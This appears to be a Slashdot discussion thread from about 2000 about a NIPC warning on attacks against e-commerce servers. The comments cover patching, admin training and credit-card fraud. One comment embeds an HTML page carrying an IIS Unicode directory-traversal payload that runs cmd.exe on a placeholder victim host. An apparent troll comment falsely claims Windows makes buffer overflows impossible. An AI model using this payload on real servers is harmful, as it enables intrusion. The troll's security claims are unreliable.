NIPC Warns Of E-Commerce Vulnerabilities 78
SueZVudu writes: "In an announcement yesterday, the National Infrastructure Protection Center said that there has been an increase in hacker activity aimed at US e-commerce sites. They're mainly exploiting three known vulnerabilities in Windows NT systems, but Unix systems have been targeted as well. Basically, they point out the holes in MicroSoft's SQL system and warn that such attacks are on the rise. You can see the story here." There've been a number of stories like this lately -- not just Microsoft, but the number of attacks is continuing to rise, and some people have been talking about more CERT [?] s regarding "super" DDOS [?] attacks.
standard cc verification is a built-in exploit (Score:3)
a) a name
b) a credit card number
c) a zip code
And that's all - your transaction will be authorized. Whoever thought up this system should be awarded with the "I killed e-commerce" trophy.
I run a free email service in Southeast Asia. Anyway, every once in a while we get complaints from some disgruntled person in the states about how one of our accounts is using their cc number. Generally, when this happens, we check the account, and usually we find a trail of purchases, along with the names and addresses to which the products were sent. We immediately lock the account.
Then we try to figure out what to do next. Our choices:
1. Alert the FBI? Un/fortunately the FBI has no jursidiction here. They can't do anything.
2. Alert the local auithorities? Well, there is _no_ law in this country. None whatsoever, sadly. And in a case like this, which would require some technical intelligence on their part, the local police would get so confused that they would probably throw us in jail. I'm not exaggerating.
3. Archive the files and wait. Yep.
An estimated 80% of the cc transactions originating in this country are with stolen cc numbers. So, if you have online cc processing on your site, MAKE SURE you block any requests originating with 202.* Of course, experienced kiddiez can use proxy servers, but you'll cut down the percentage.
A friend of mine has an online gift shop, and fake orders where sent through his system for weeks. Every request which is _verified_ by the cc authority and later cancelled cost him $5. He tried to notify the bank where the stolen numbers where coming from and got no response - they didn't care. Why should they, they were making $5 on every fraudulent transaction.
e-commerce sites are going to get killed by this when more unscrupulous people figure out how easy it is to order goods over the internet. as i said, all it takes is a name, a cc number, and a zip code.
It's the time of year... (Score:1)
I think it's going to be rough sailing 'til around mid-January.
- Eric
Re:Increasing problems... (Score:1)
Half truth (Score:2)
Yes, the admin does make a difference. Yes, Linux can be cracked.
But the OS does make a difference as well. Some OSes are more vulnerable than others. There's a difference in how often vulnerabilities are found.
The article mentions three different vulnerabilities in Microsoft systems. All three are addressed by security bulletins in the Microsoft websites, so what's the problem? The biggest problem is not the existence of vulnerabilities by themselves, the problem is that Microsoft systems have so many different vulnerabilities that's very hard for a system administrator to keep track of them all. Comparatively, there's much less need of "admin-hours" to keep track and eliminate Unix vulnerabilities.
Another factor that contributes to this problem is that Microsoft systems are designed to be easy to configure and use by people with minimum training. This means that a Microsoft admin is more likely than a Unix admin to be less than optimally trained for the job. The typical "cracked Linux box" is a home computer connected to a broadband internet connection. These can be dangerous, if they are used for DoS attacks, for instance, but they usually don't have large databases of customer credit card numbers.
Linux distributors are all working on easier installations, but it still takes a lot more administrator training to set up an e-commerce site on Linux than on MS. So, overall, I would say the security problem mentioned in the article comes both from intrinsic OS problems and insufficiently trained or careless system administrators.
Re:Old issue (Score:1)
It would be cool if the hacker included the fix ! (Score:1)
That would make quite an improvement in "hacker ethics".
Brainstorming mode: the might even be a way to talk yourself out of legal prosecution if you do it this way, since you could claim that these security holes could be used to D(istributed)DoS your system, and you are just fixign them "in hot pursuit" :-P
Re:Hello Mr Sysadmin (Score:2)
As a part-time NT administrator, yes, it is hard to keep up with the patches on NT.
Service packs are easy to apply, they are not the problem. Someone hands you an unpatched NT box, what do you do? Assuming that you subscribe to the Microsoft Product Security Notification Service, you have to read a huge number of security bulletins. By my count, 60 bulletins from 1999 and 93 bulletins from 2000. For each one of these bulletins, you have to figure out if they are applicable to your system, and if so, download and apply a patch. This is a lot of work and can be confusing. For many NT system administrators, system administration is not their primary job, they are programmers or engineers. The security mailing lists are an even bigger time sink. They are high volume lists with a low signal-to-noise ratio.
Re:Increasing problems... (Score:1)
Not always the sites' fault! (Score:2)
--
"Give him head?" [pdqsolutions.com]
Re:I see a different trend... (Score:3)
Actually, I hate to admin the truth to this one, and I wish I had some moderator points to up this one some.
What makes this worse though isn't just the MCSE process. It's the age discrimination that does occur to a great degree on 30-35 year old IT workers. You take your most experienced group and disregard them as "too old" or "too expensive" in favor of the more hours-flexible, inexpensive (generally), and inexperienced. Of course we're going to have these problems. This just doesn't happen in most other job arenas.
Oh well, enough ranting for me, these problems should resolve themselves somewhat when the job market corrects itself to some extent.
Re:Old issue (Score:1)
<html>
<head>
<title> Thanks for cracking your webserver for me! </title>
</head>
<body>
<IMG SRC="http://www.victimhost.com/scripts/..%c1%9c..
y+..\..\winnt\system32\cmd.exe+cmd1.exe">
<IMG SRC="http://www.victimhost.com/scripts/..%c1%9c..
cho+YOU_ARE_CRACKED+>YOU_ARE_CRACKED&dir&am p;type+YOU_ARE_CRACKED">
</body>
</html>
Of course, this is a bit garbled, but the point is clear.
Re:standard cc verification is a built-in exploit (Score:1)
Where IS geographical location)?
--
If the good lord had meant me to live in Los Angeles
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Any GOOD Apple ][ was hacked to support Applesoft (][+) and a 'cracking rom', one that takes the NMI and re-directs it to your ROM. (normally you take out the casette interface)
Re:We all knew this would happen. (Score:2)
2. "Run by the geeks"? Oh, so Dalvenjah has stopped his tyranny ("/akill * You all suck", anyone?)
People are over reacting. (Score:1)
One guy on the show (some FBI e-security expert) mentionned a very interesting fact: E-commerce is not new. The only thing "new" about it is the fact that you do it from the comfort of your own home.
He said that most people dont even realize that when they withdraw money off the ATM, or pay at the restaurant via credit or debit card, they're in fact using "e-commerce".
The only difference being that the banking networks are a bit more private. (Even that is changing, since more and more banks are using VPN's with strong crypto.)
The other thing worth of mention from that show was that we're only seeing the tip of the iceberg. Banks and other institution involved in e-commerce are reluctant to sound the alarm when it comes to fraud. They dont want to scare the average joe. This helps the criminal, since the other institution are not warned when a new hole arise. If they would sound the alarm loud and fast, everyone else could patch up.
Summary: It's not any safer to have a clerk swipe you credit card in a machine then to type it yourself on the net. With the technique of skimming, Actually, it's probably safer to type it up yourself on the net. [verifyfraud.com]
It's not just e-commerce (Score:1)
Re:Old issue (Score:1)
(sorry just testing)
Re:mod this up (Score:1)
Re:Prevention (Score:1)
Re:Reasons to worry (Score:1)
~cHris
--
Chris Naden
"Sometimes, home is just where you pour your coffee"
Re:Increasing problems... (Score:1)
Re:Who's casting the first stone? (Score:1)
The versions of Linux they tested were: "General Linux 2.0 kernel-based," Slackware 4.0, and Redhat 6.1 running 2.2.12. Definitely unusual!
From what I can gather, BindView notified Microsoft of the FINWAIT_1 problem in June and the ESTABLISHED problem in October. As for everyone else, BindView notifed CERT of the ESTABLISHED problem in October and relied on CERT to notify EVERYONE ELSE!!!! The publication date of the advisory from CERT is Novemver 30! The only part I am not *absolutely* sure about is whether BindView notifed Microsoft directly in October--MS has a patch out for 95, 98, 98SE, ME, and NT4 and knowing MS's slow release time(it took them 6 months to fix the FINWAIT_1 problem) I tend to think MS had a headstart! If they did, then this is BULLS**T!!! This speaks volumes for releasing the exploit and notifying the vendor at the same time!
Congrats to BindView for finding this problem! BOO to BindView for screwing up on the notification! Next time, notify ALL the vendors you know are affected, not just MS!
Re:Increasing problems... (Score:1)
To me, this doesn't mean much in terms of who has the best OS but I juts thought I'd put you straight.
Regards
WORD! (Score:3)
No that's no joke, but reality. They simply don't understand that if a server is behind a firewall but still connected to the internet, it still can be very vurnerable. So they don't see the need to apply all these patches and configuration settings.
I did the MCSE course myself a couple of years back, just to get that raise ;) and it's true: if you get the title you think you're AdminGod who knows everything. When you're then sent to a real life situation with servers running all kinds of weird software that affects your work but you don't know that software, you understand how that 16 year old kid must feel, you described perfectly.
I went back to programming right away... :) Much more fun. ;)
--
Re:Hello Mr Sysadmin (Score:1)
I know it is hard to administer a NT system.
What I wanted to point out is that a lot of people just take secruity too lightly. As you mention a lot of NT-Admins are not able to devote all or a lot of their time to administering.
Still I think it must be possible for a corp(I guess PHB are most to blame for a lot of this stuff) that relies heavily on their IT Infrastructure to pay someone(or even several people) to look after their servers. A security breach(even worse, a security breach that goes unnoticed, that's the real danger) can destroy a company that relies heavily on the web.
It didn't want to say administering NT itself is trivial, but rather that system security should be on the priority lists of everybody who relies on their servers and data.
It is neccesary to educate people that they need to take strong security measures regarding their side just as they have to take care that there are virusscanners on the client machines.
Re:What MS needs is... (Score:1)
If they did create a auto scripting thingy (thats a scientific term BTW :) it would more than likely be an even bigger security risk than the bugs it would help to fix, just think, allowing an executionable to be automatically ran with a little calling card from microsoft. Thats the sort of thing thats just cries "Take advantage of me"
Anyways, sorry for the rant
Da Cr33p
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
--
Re:Increasing problems... (Score:2)
<clue>
Forgive my bluntness, but is it really so bad? I run <lamer>RedHat</lamer>, and I find it very easy to stay on top of the worst exploits simply by subscribing to their mailing list. Whenever a patched component is available, I know it immediately simply by spotting the distinctive subject line in my inbox. It takes a few seconds to read the message, a few seconds to type in ncftpget whatever (fewer, if you use the <lamer>Netscape mail client</lamer> like me, and merely have to click the link), and a few seconds more to type rpm -Uhv whatever. If you're a pro, you can show your professionalism by dedicating a few extra minutes to reading up on what has actually been changed.
</clue>
Hardly a major challenge. It certainly beats applying a service pack and then trying to fix the resulting trainwreck; at least with Linux patches you can pick and choose your bugs.
All that to the side, I would say that maintaining system integrity is the primary responsibility of a "busy admin". Spend whatever time it takes to do it right. If your boss wants too many other things that distract from that fundamental responsibility, you should find another job while the economy's still hot.
--
Linux examples.... WAS Re:Hah! They deserve it! (Score:2)
Next time, if you are going to 'pick' on Unix, try using BSD as the basis of your attack. Oh, wait. That means you'd have to WORK to pick on Unix if you use BSD as the example. And your employer Micro$oft is paying you to worry about Linux...not BSD.
All 6 of your 'examples' are non-issues with BSD.
ftpd : The version of ftpd shipped with all versions of FreeBSD since 2.2.0 is not vulnerable to this problem
RPC : FreeBSD is not vulnerable to this problem.
Proper stack : FreeBSD-For a remote attacker, the scope of the attack is severely limited by the requirement to complete a TCP connection with the victim machine, meaning the IP address of the attacking machine is disclosed, and as such the attack can be effectively responded to through the use of tracing, filtering and legal mechanisms.
Kerberos : NetBSD-not-for-export "secr" sets are vulnerable to some of the problems cited in the advisory. (ahhh, them dangerous munitions)
BIND : All versions of FreeBSD after 4.0-RELEASE are not vulnerable to this bug
Netscape : no BSD mention
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
I'm proud to report that my Apple ][ still hasn't been hacked.
--
Re:Increasing problems... (Score:1)
Second: Linux is hardly ever specifically mentioned. Most security problems are application problems, not kernel problems and affect all *nixes. Linux kernel problems are as rare as Windows NT kernel problems.
Typically Win32 problems are with IIS, LanManager, IE and Office. Recent *nix problems have to do with apache/mysql, samba, bind, bash, ssh, identd etc. The only problems that haunt mostly the Windows OS are the Integration (and Visual Basic) related problems. Apparently that is just too complex to get secure. It's the fact that there is virtually no integration between most *nix applications that saves the *nix community from this *for now*.
Links: [Microsoft Security] [microsoft.com] [SecurityFocus] [securityfocus.com] [CERT] [cert.org]
--
Re:standard cc verification is a built-in exploit (Score:1)
__
Security awareness (Score:1)
People blames vulnerabilities in some products, in fact most of the problems may cause by lack of awareness in computer security.
Businessmen rely on the ecommerce developers to deal with security, but their knowledge in such field may be very questionable.
Computer security, most likely, is not a mandatory subject of IT graduate, very high chance that a skillful programmer has no knowledge in security.
What's so bad about it? I've encountered three instances that explains everything:
1) I suggested to a team of web admins seperate the database system from the web server for security reason. End up I'm considered by them as trouble-maker.
2) SSH, as we all know, has password and RSA authentication, the latter is supposed to be having higher security level than the former. A person installed both authentication methods because he want to have high security of RSA and convenience of password auth. I asked him, why would a hacker bother to break your RSA while he could take a easy path to break your password authentication?
3) I tried to explain to my peers that brute force attack is possible so we must set some policies(expiration, length and format of password, etc.) to our password system. They laughed and said brute force attack is a joke because that'd generate a lot of log entry and there are a huge delay in login retry.....
I could go on. I found that most people do not bother to take to much time on security things but rather rely on the default secuirty of the packages they used. E.g. RedHat has many security holes come with default installation, but since many people thing Linux is secured, then RedHat is secured.
Just an example, I didn't say RedHat is bad. Many others might be more worse.
"super" DDOS attacks (Score:3)
Something MUST be done about this!
Re:Hello Mr Sysadmin (Score:1)
Is patching really that hard?
It's very hard for production system. Patching a NT system is even harder.
I could explain in detail, but rather I just give you examples.
I was asked to upgrade the patch from SP3 to SP4, on a Domino Lotus Notes server.
After the upgrade all users constantly received new message notifications but most were false alarm. We tried to upgrade(and even downgrade) the Domino Lotus Notes server in vain. We could do nothing else but downgrade the patch
Unfortunately, the system couldn't restart after uninstall the patch. Then we...(I skipped the sad ending here)
We learn from this story that patching a NT is very destructive, especially we don't know what would be affected after the patch
To be fair I gave you another story in similar situation caused by apply 'application update'(aka patch, fixes, whatever) to a HP server.
It's Y2K patch, along with all other 'application update'. I cut the story short, our /var blow up - Downtime - we were blamed.
However, difference in patching UNIX is that we could actually select a particular fix to apply. In NT we shall install the patch and pray.
I really wish NT works well. To be honest I am not an anti-Microsoft, but I just wouldn't beg my career on it.
Re:standard cc verification is a built-in exploit (Score:1)
The entire concept is inherently insecure, whether it's stolen cards or stolen numbers. The problem with stolen numbers is that it can take longer before the cardholder knows it's missing and being used for nefarious purposes.
Re:"super" DDOS attacks (Score:1)
We all knew this would happen. (Score:3)
Consider the original IRC network, EFnet. It's essentially dead - completely unreliable and virtually impossible to connect to. Because of people DOSing the servers.
I liked the net a whole lot more when it was just us geeks.
What? Vulnerabilities in Windows and Unix? (Score:1)
I thought Windows was the only OS with vulnerabilities.
Guess not.
Re:Old issue (Score:1)
next time i'll read the article a bit more carefully
Okay, but will this problem ever go away? (Score:3)
I don't mean to be a pessimist, but it's inevitable that e-commerce will occasionally be subverted. It goes with the territory; we don't live in a perfect world and trying to make sure things always are secure is a waste of programming and marketing time.
Internet security paranoia has gone on for far too long, mostly because the mass media thrives off creating terrifying hoaxes to show on the 6-o'-clock news. (This in spite of a recent PC Data survey that showed e-commerce transactions are more likely to be legit than mail order ones.) At one time, e-commerce was somewhat insecure and unreliable. But those days are over; there's no reason someone should be biting their nails after ordering from Amazon.com or CDNow. It's time to stop perpetuating the cracker myth and put our efforts into actually building the next-generation e-commerce infrastructure.
How appropriate... (Score:3)
To get more information and potentially sign up, click here [securityfocus.com].
Increasing problems... (Score:1)
And Microsoft preaches on about how secure their software is.
The last time Linux was mentioned with some sort of security problem in the news was the prolin virus -- another Windows thing. How ironic.
Old issue (Score:5)
Hello Mr Sysadmin (Score:4)
Now unfortunately they don't mention which sites where affected and what the crackers actually did.
What I find really disturbing is the fact that for all of the 3 exploits(which are rather old) patches or configuration changes were avaiable. So you can bash Microsoft to death here for letting such security holes happen but at least they patched it. The question is wether or not the patches were avaiable before( I mean one of the holes was found in 99!)
Is it really that hard to patch your system regulary as an Sysadmin? You are responsible for a e-commerce system and you don't fiond the time to patch your system? I guess most people don't even bother to read securityfocus [securtyfocus.com] or a similar ressource or at least the MS security bulletins.
I guess a lot of corporations still think a security audit is some kinf of luxury and even more don't seem to remembers that it's not done with one check, security is soemthing you have to take care of constantely.
And what are we going to see?
People talking about master "hackers". In those cases the measures to close those holes seem pretty trivial(if the patches were avaiable on time, which you can't judge now).
Good luck finding investors... (Score:1)
Since when is the US Govt experts on Internet Security anyways? Hasn't every
BTW, how long until MS says to the Govt: "You let us operate the way we want and we'll include Carnivore in all of our programs"?
Bored, must sleep.
What MS needs is... (Score:4)
...a way to patch these holes automatically. Maybe they could develop a scripting language that could be run through an email client and then just mail the patch to everyone for auto-execution.
Re:What MS needs is... (Score:1)
I can see that happening with the sort of thing you're thinking of... way bad idea.
I mean, the only explanation for sysadmins not patching months- (in some cases years-) old holes and bugs are laziness or incompetence. Period. One more automated thing will make it that much easier for chimpanzees to run webservers -- and we don't want that, do we?
--
"Give him head?" [pdqsolutions.com]
Re:We all knew this would happen. (Score:1)
Re:Old issue (Score:1)
Actually I'd figure that an increase in illicit activity is precisely a call for caution. Unfortunately when it comes to IIS you don't have too many ways to ensure that the patches you have applied have actually fixed the problem or even that you havn't undone the patch by installing a further patch.
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Re:Hello Mr Sysadmin (Score:1)
Also, the number of patches you need to apply is quite limited if you just apply the latest SP first (12 for Win2k with SP1), and patches are often named after the SP they will appear in. I would say: Piece of cake to keep those systems up-to-date. Only problem remaining is that MS insists on re-booting after every single applied patch. Then again, isn't that why god gave us perl for win32? ;-)
--
Re:Prevention (Score:1)
Many crackers do it for the kick. Part of the trick is not being caught. People capable of still causing real harm to online traders are amazingly good at that particular trick. Unlike (I imagine) real-life crimes, with online crimes you have an amazing amount of time to prepare properly and set-up your systems.
About registration, I bet they do... Problem with IPs is: A criminal who does not want to get linked to multiple attacks simply doesn't use the same car twice but just steals new number-plates or or simply steals a car. Same holds for IP addresses. You just get a new one (one?) for every attack or use someone else's, and preferably never use your own.
--
Re:Increasing problems... (Score:2)
FP.
Re:Hello Mr Sysadmin (Score:1)
Re:I see a different trend... (Score:1)
In this position you're responsible for the bigger picture and the details like bugfix Q1238948 become harder to pay attention to -- you're in meetings, and you're chasing after the scumbags that work for you to get them to do the minimum of the job performance, all the while having to please a higher level of management with even less technology experience than your old boss whose job you now have.
I think it will take a serious collapse in the economy for the job market alone to correct this. We'll need to see a contraction of IT infrastructure (ie, less stuff to maintain and admin) for this to occur. I'm certainly not sold that a partial collapse of the dotcom world is enough -- plenty of dotcom people I've met are WORSE than standard issue corporate IT. They often strike me as the kinds of people with more interest in a technology lifestyle than in technology itself.
Re:Increasing problems... (Score:1)
I have to dissagree. If your a pro, you don't blindly apply patches to production systems the second you hear/read of their existance. Sane admins like to test the "fixes" on non-critical systems first and make sure the they both work and cause no additional harm. This slows down the process a bit but results in fewer mistakes.
Re:Hah! They deserve it! (Score:1)
same trend, different place. (Score:1)
All the same things can be said about the people who WRITE that software in the first place. Perma-temps, H1B slaves, and other people forced to work 80 hour weeks are not going to produce the best code in the world. Inexperience can be found where you look for it, but it's more important in Redmond.
Sure, it's possible to bone up OpenBSD, but they don't make the same kind of prommises that MS does, and that's where these holes are. MS prommises that their software is secure AND that MSCEs can run it in a secure fashion. They need to live up to both.
Re:standard cc verification is a built-in exploit (Score:1)
My bottom line improved DRAMATICALLY.
Some countries, I block, as much as I can, at the router level. Those countries include china, any moslem country, all the russian republics, any country which was once a soviet satellite.
No way, no how, would I ever do this thing otherwise until credit card companies come up with
a scheme that guarantees the authenticity of the card holder.
Ask yourself this: Why does paypal only accept american accounts? Do you think they're stupid?
Re:standard cc verification is a built-in exploit (Score:1)
Everything goes fine, I confirm my order of about $700. The next day, I get this mailed to the spam-bucket account I use for online transactions:
We have been unable to process your order because your billing and shipping information did not verify with the bank that issued the credit card you used to place your order.
As stated on our website, shipping and billing information, if different, must both be on file with the issuing financial institution.
Now this was a surprise to me because:
Meanwhile, it might be a good idea for those of you who have a problem with online credit card transactions bouncing who also ship physical product to addresses to check with the bank and implement these measures. If there's no way for a person to get your product to them, there is no reason for them to expose themselves to the risk of using the stolen number at your site.
Who's casting the first stone? (Score:1)
Many systems are vulnerable to this attack. Right now, Linux, the BSD's, and a number of other UNIX flavors appear vulnerable; see the statements from IBM, Compaq, and FreeBSD in the advisory.
Interestingly, MS says that Win2K is resistant to these attacks by design, though NT 4 has been patched. I wonder how they defend against an attack from multiple machines without refusing new connections or RST'ing the wrong ones? Similar recovery problems have already proven somewhat difficult in the context of handling local memory exhaustion attacks on Linux systems.
... (Score:1)
Why are they complaining?? (Score:3)
Re:Okay, but will this problem ever go away? (Score:1)
The real cost of all this... (Score:3)
The reason the Internet is such a great tool for communication, and also the reason that it is so easily abused, is that every node on the network is empowered. Everyone is able to send and receive at will, limited by the amount of bandwidth that they have. This is also its weakness, in that the model "trusts" its users not to abuse the system. Originally, when the network was all military and education, this was a reasonably safe assumption.
But we've seen what happens when everyone trusts everyone else. Someone comes along and abuses that trust - like the Morris worm in 1988. So we try and secure our individual sites, which means that administrators have to be smart and knowledgeable because the nature of the traffic coming to their sites is not predictable. And, as ever, if we can't protect ourselves, someone's going to want to jump in and do it for us.
My fear is that eventually the business side of the Net - its use as a money making tool - will overtake its other uses. That the "solution" to the problem of hacking and DDOSing will be to limit the traffic that flows through the network. That, essentially, the internet will turn into a giant content-delivery engine with just enough interactivity to allow you to Add Item to your Shopping Cart.
Of course, the fact that commercial sites use crummy, easily hacked software tends to push in favor of these sorts of limits. Almost makes you wonder if they're doing it on purpose...
Re:standard cc verification is a built-in exploit (Score:1)
Re:Increasing problems... (Score:1)
Anyway, my point, linux or windows or whatever OS you use doesn`t make the difference in being secure. It`s the admin who makes the difference.
Keep a close eye on your machines, update them whenever needed, keep in touch with the `scene`.
I personnaly tend to be `friends` with some of the more advanced scriptkiddies around, ok, they`re mostly idiots who haven`t got a clue, but they love to brag about their latest actions, and the latest exploits they have heard about... and if they know of any that affect you... you better start fixing
now... you can`t get your machine to be 100% fool proof, but you can make it less inviting to script kiddies... use IDS, Firewalls, secure your machines, make sure that you log remotely, secure those logs,
Security is hard work
now this doesn`t only show in security, mostly the entire infrastructure of e-commerce sites is CRAP to say the least.
mod this up (Score:1)
Under Windows you can run as many services as you like and even log in as administrator and the OS is still secure.
Windows virutal memory is an object, not a file and it has advanced security audits that make buffer overlfows impossible.
Unix is so obssesed with compatibility that no one has ever really even bothered to write a procted memory buffer that is object oriented. Oh wait! C++ is for wussies in the unix world. Its just btter to rewriute the wheel. So I guess its impossible to write an NT style buffer object in Unix! At least dekstops like gnome are written in c++. Oh ya. Whatever
Go 30 year technology1
Re:standard cc verification is a built-in exploit (Score:1)
Hey! All the IP addresses where I work start with 202, and I'm fairly sure that New Zealand isn't the country in Southeast Asia you're referring to. I don't think that IP address is a very good way of determining geographical location, and I don't think geographical location is a good way of determining guilt.
Re:We all knew this would happen. (Score:1)
One of the main reasons that EFNET is unused is because it has no chanserv/nickserv features and is therefore unusable, as it is far too easy to hack around with
Contrast this to DALnet, which has teams of volunteers patrolling it and features allowing reliable and secure operation of room and servers. Just because EFNET was there first doesn't mean it should be revered. DALnet is still very much run by the geeks (hence dal.net [dal.net] not dalnet.com, iyswim.
Like it or not, the web is a much bigger place than it used to be. This kind of harking back to "the good old days" won't help preserve the distributed, open and hackable (in the good sense) nature of this beast we created. If a service, site or protocol is unreliable and not very viable for its intended purpose, it will die, nostalgia or not. We can only hope this is totally true and MS doesn't prove the exception with SQL et al.
Ben^3Bah Humbug (Score:1)
What was the propriety info that was downloaded? Was it info about the propriety of cracking e-commerce sites?
Also, the article goes on to cite three old Microsoft exploits. Where's the promised Unix vulnerability? I'm not saying Unix doesn't have exploits, only that this article says "Unix based operating systems have been victimized as well" and fails to explain.
Anyhow, I fail to see why this is a "National Infrastructure" issue. Some greedy fools slapped together a website with Microsoft "solutions" and got hacked. If customers care, the market will reward sites with better security. If customers don't care, why should the government?
I think this "nipc" is trying to create a pseudo-crisis to make themselves look relevant. Oldest trick in the governmental book.
Re:Who's casting the first stone? (Score:2)
From my experience of load testing NT4 boxes, it refuses new connections, basically.
Re:Hello Mr Sysadmin (Score:1)
I see a different trend... (Score:5)
Hear me out on this one.
The industry has been so cheapened by the fact that any yahoo that can read a book can pass an MCSE exam and get a 70k/yr job doing admin work on so-called "high-end" NT servers. When in reality this is like sending a kid who just got his driver's license at 16 to run the Indy 500. No driver's license or MCSE certificate can substitute for real world experience at the helm.
And that comes out over time when you have inexperienced people out there. Common, fairly simple bugs and holes which come about through the normal life of software, become more serious when you don't have people with experience to handle them properly and do simple things like, say, remove the default configuration on software that is wide open like wu-ftpd and IIS. (Not to pick on any OS in particular, there)
I think the NIPC warning just signifies from them what most of us (/.'ers and the like) have known for quite some time, that vulnerabilities are more serious when you don't have qualified people to take care of them
obviously (Score:1)
Re:What MS needs is... (Score:1)
Please install trojaniZed_update.yadda.yadda.yadda.tar.gz
it fixes a really nasty exploit.
Have a nice day.